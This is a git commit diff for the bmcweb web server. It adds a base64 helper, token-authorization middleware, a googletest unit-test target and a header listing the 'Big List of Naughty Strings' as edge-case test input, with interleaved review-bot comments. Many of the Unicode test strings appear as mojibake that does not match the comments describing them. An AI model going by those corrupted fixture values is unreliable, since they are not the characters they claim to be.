-rw-r--r-- | CMakeLists.txt | 36 | ||||
m--------- | GSL | 0 | ||||
m--------- | googletest | 0 | ||||
-rw-r--r-- | include/base64.hpp | 9 | ||||
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 687 | ||||
-rw-r--r-- | include/token_authorization_middleware.hpp | 23 | ||||
-rw-r--r-- | scripts/file_to_string_array.py | 29 | ||||
-rw-r--r-- | src/base64.cpp | 138 | ||||
-rw-r--r-- | src/base64_test.cpp | 62 | ||||
-rw-r--r-- | src/blns.txt | 685 | ||||
-rw-r--r-- | src/gtest_main.cpp | 6 | ||||
-rw-r--r-- | src/token_authorization_middleware.cpp | 49 | ||||
-rw-r--r-- | src/token_authorization_middleware_test.cpp | 26 | ||||
-rw-r--r-- | src/webserver_main.cpp (renamed from src/example.cpp) | 146 |
14 files changed, 1801 insertions, 95 deletions
diff --git a/CMakeLists.txt b/CMakeLists.txt index 323747afa8..140b9cbe93 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -57,22 +57,50 @@ include_directories(g3log/src) # Debug sanitizers find_package(Sanitizers) +# C++ GSL (Guideline support libraries) +include_directories(GSL/include) + +set(WEBSERVER_MAIN src/webserver_main.cpp) set(SRC_FILES - src/example.cpp include/crow_g3_logger.hpp include/ssl_key_handler.hpp include/color_cout_g3_sink.hpp + src/token_authorization_middleware.cpp + src/base64.cpp ) -# Executable +set(UT_FILES + src/gtest_main.cpp + src/base64_test.cpp + src/token_authorization_middleware_test.cpp + ${CMAKE_BINARY_DIR}/generated/blns.hpp +) -add_executable(bmcweb ${SRC_FILES}) -#target_link_libraries(example crow) +# big list of naughty strings +file(MAKE_DIRECTORY "${CMAKE_BINARY_DIR}/generated") +add_custom_command(OUTPUT ${CMAKE_BINARY_DIR}/generated/blns.hpp + COMMAND xxd -i ${CMAKE_CURRENT_SOURCE_DIR}/src/blns.txt ${CMAKE_BINARY_DIR}/generated/blns.hpp) + +# googletest +#find_package(GTest REQUIRED) +enable_testing() +find_package(GTest REQUIRED) + +add_executable(unittest ${SRC_FILES} ${UT_FILES}) +target_link_libraries(unittest GTest::GTest GTest::Main) +target_link_libraries(unittest Boost::boost Boost::system) +target_link_libraries(unittest ${CMAKE_THREAD_LIBS_INIT}) +target_link_libraries(unittest OpenSSL::SSL OpenSSL::Crypto) +target_link_libraries(unittest g3logger) + +# bmcweb +add_executable(bmcweb ${WEBSERVER_MAIN} ${SRC_FILES}) target_link_libraries(bmcweb Boost::boost Boost::system) target_link_libraries(bmcweb ${CMAKE_THREAD_LIBS_INIT}) target_link_libraries(bmcweb OpenSSL::SSL OpenSSL::Crypto) target_link_libraries(bmcweb g3logger) + include_directories(${CMAKE_CURRENT_SOURCE_DIR}/include) # this needs to be at the end to make sure all includes are handled correctly diff --git a/GSL b/GSL new file mode 160000 +Subproject 3819df6e378ffccf0e29465afe99c3b324c2aa7 
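Review bot: The `add_custom_command(OUTPUT ${CMAKE_BINARY_DIR}/generated/blns.hpp COMMAND xxd -i ...)` declares no `DEPENDS`, so a change to src/blns.txt will not regenerate the header in an existing build tree; it also assumes `xxd` is on PATH with no `find_program` check and lacks `VERBATIM`. Adding `DEPENDS ${CMAKE_CURRENT_SOURCE_DIR}/src/blns.txt VERBATIM` to that command fixes the first two points. `enable_testing()` is called but this hunk registers no `add_test`, so `ctest` will report no tests unless one is added elsewhere; `add_test(NAME unittest COMMAND unittest)` after the `unittest` target would wire it in. The commented-out `#find_package(GTest REQUIRED)` directly above the live call is dead text and can be dropped.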
diff --git a/googletest b/googletest
new file mode 160000
+Subproject aa148eb2b7f70ede0eb10de34b6254826bfb34f
diff --git a/include/base64.hpp b/include/base64.hpp
new file mode 100644
index 0000000000..f5ff338cae
--- /dev/null
+++ b/include/base64.hpp
@@ -0,0 +1,9 @@
+#include <gsl/string_span>
+#include <string>
+
+namespace base64 {
+
+ bool base64_encode(const gsl::cstring_span<> &input, std::string &output);
+ bool base64_decode(const gsl::cstring_span<> &input, std::string &output);
+
+}
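Review bot: include/base64.hpp has no `#pragma once` or include guard, unlike include/token_authorization_middleware.hpp added in the same commit; add `#pragma once` as its first line. The `bool` return is undocumented: from the src/base64.cpp hunk, `base64_encode` always returns true while `base64_decode` returns false when it meets a byte outside the base64 alphabet, so each declaration should carry a one-line comment stating that contract and that `output` is unspecified after a false return. Taking `gsl::cstring_span<>` by const reference is unusual — a span is a cheap view and is normally passed by value.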
\ No newline at end of file
diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp
new file mode 100644
index 0000000000..4ba27f73e4
--- /dev/null
+++ b/include/big_list_of_naughty_strings.hpp
@@ -0,0 +1,687 @@ +const std::string naughty_strings[] = { +// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + +// Reserved Strings +// +// Strings which may be used elsewhere in code + +"undefined", +"undef", +"null", +"NULL", +"(null)", +"nil", +"NIL", +"true", +"false", +"True", +"False", +"TRUE", +"FALSE", +"None", +"hasOwnProperty", +"\\", +"\\\\", + +// Numeric Strings +// +// Strings which can be interpreted as numeric + +"0", +"1", +"1.00", +"$1.00", +"1/2", +"1E2", +"1E02", +"1E+02", +"-1", +"-1.00", +"-$1.00", +"-1/2", +"-1E2", +"-1E02", +"-1E+02", +"1/0", +"0/0", +"-2147483648/-1", +"-9223372036854775808/-1", +"-0", +"-0.0", +"+0", +"+0.0", +"0.00", +"0..0", +".", +"0.0.0", +"0,00", +"0,,0", +",", +"0,0,0", +"0.0/0", +"1.0/0.0", +"0.0/0.0", +"1,0/0,0", +"0,0/0,0", +"--1", +"-", +"-.", +"-,", +"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", +"NaN", +"Infinity", +"-Infinity", +"INF", +"1#INF", +"-1#IND", +"1#QNAN", +"1#SNAN", +"1#IND", +"0x0", +"0xffffffff", +"0xffffffffffffffff", +"0xabad1dea", +"123456789012345678901234567890123456789", +"1,000.00", +"1 000.00", +"1'000.00", +"1,000,000.00", +"1 000 000.00", +"1'000'000.00", +"1.000,00", +"1 000,00", +"1'000,00", +"1.000.000,00", +"1 000 000,00", +"1'000'000,00", +"01000", +"08", +"09", +"2.2250738585072011e-308", + +// Special Characters +// +// ASCII punctuation. All of these characters may need to be escaped in some +// contexts. Divided into three groups based on (US-layout) keyboard position. + +",./;'[]\\-=", +"<>?:\"{}|_+", +"!@#$%^&*()`~", + +// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, +// and U+007F (DEL) +// Often forbidden to appear in various text-based file formats (e.g. XML), +// or reused for internal delimiters on the theory that they should never +// appear in input. +// The next line may appear to be blank or mojibake in some viewers. 
+"", + +// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. +// Commonly misinterpreted as additional graphic characters. +// The next line may appear to be blank, mojibake, or dingbats in some viewers. +"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + +// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode +// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), +// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often +// treated as whitespace in some contexts. +// This file unfortunately cannot express strings containing +// U+0000, U+000A, or U+000D (NUL, LF, CR). +// The next line may appear to be blank or mojibake in some viewers. +// The next line may be flagged for \"trailing whitespace\" in some viewers. +" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + +// Unicode additional control characters: all of the characters with +// general category Cf (in Unicode 8.0.0). +// The next line may appear to be blank or mojibake in some viewers. +"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", + +// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. +// The next two lines may appear to be blank or mojibake in some viewers. +"ᄏ", +"ᄒ", + +// Unicode Symbols +// +// Strings which contain common unicode symbols (e.g. 
smart quotes) + +"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", +"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", +"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", +"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", +"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", +"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", +"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", +"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", +"¬ナロ¬ナワ¬ナン¬ナ゙", +"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", +"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + +// Unicode Subscript/Superscript/Accents +// +// Strings which contain unicode subscripts/superscripts; can cause rendering issues + +"¬チᄚ¬チᄡ¬チᄉ", +"¬ツタ¬ツチ¬ツツ", +"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", +"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + +// Quotation Marks +// +// Strings which contain misplaced quotation marks; can cause encoding errors + +"'", +"\"", +"''", +"\"\"", +"'\"'", +"\"''''\"'\"", +"\"'\"'\"''''\"", +"<foo val=¬タワbar¬タン />", +"<foo val=¬タワbar¬タン />", +"<foo val=¬タンbar¬タワ />", +"<foo val=`bar' />", + +// Two-Byte Characters +// +// Strings which contain two-byte characters: can cause rendering issues or character-length issues + +"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", +" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", +"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", +"←テᄄ│ミᄑ₩ᅠᄐ", +"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", +"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", 
+"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", +"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", +"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + +// Changing length when lowercased +// +// Characters which increase in length (2 to 3 bytes) when lowercased +// Credit: https://twitter.com/jifa/status/625776454479970304 + +"ᄎ", +"ᄒ", + +// Japanese Emoticons +// +// Strings which consists of Japanese-style emoticons which are popular on the web + +" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", +"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", +"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", +"__ᄒロ(,_,*)", +" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", +"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", +", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", +"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", +"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", +"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", +"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + +// Emoji +// +// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + +"゚リヘ", +"゚ムᄅ゚マᄑ", +"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", +"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", +"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", +"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", +"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", +"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", + +// Regional Indicator Symbols +// +// Regional Indicator Symbols can be displayed differently across +// fonts, and have a number of special behaviors + +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + +// Unicode Numbers +// +// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +"ᄐムᄐメᄐモ", +"ᄀᄁᆪ", + +// Right-To-Left Strings +// +// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. 
ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", +"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", +"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", +"ᄋᄑ", +"ᄋᄎ", +"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + +// Trick Unicode +// +// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +"¬タᆰ¬タᆰtest¬タᆰ", +"¬タᆱtest¬タᆱ", +"¬タᄅtest¬タᄅ", +"test¬チᅠtest¬タᆱ", +"¬チᆭtest¬チᄃ", + +// Zalgo Text +// +// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", +"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", +"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", +"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", +"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + +// Unicode Upsidedown +// 
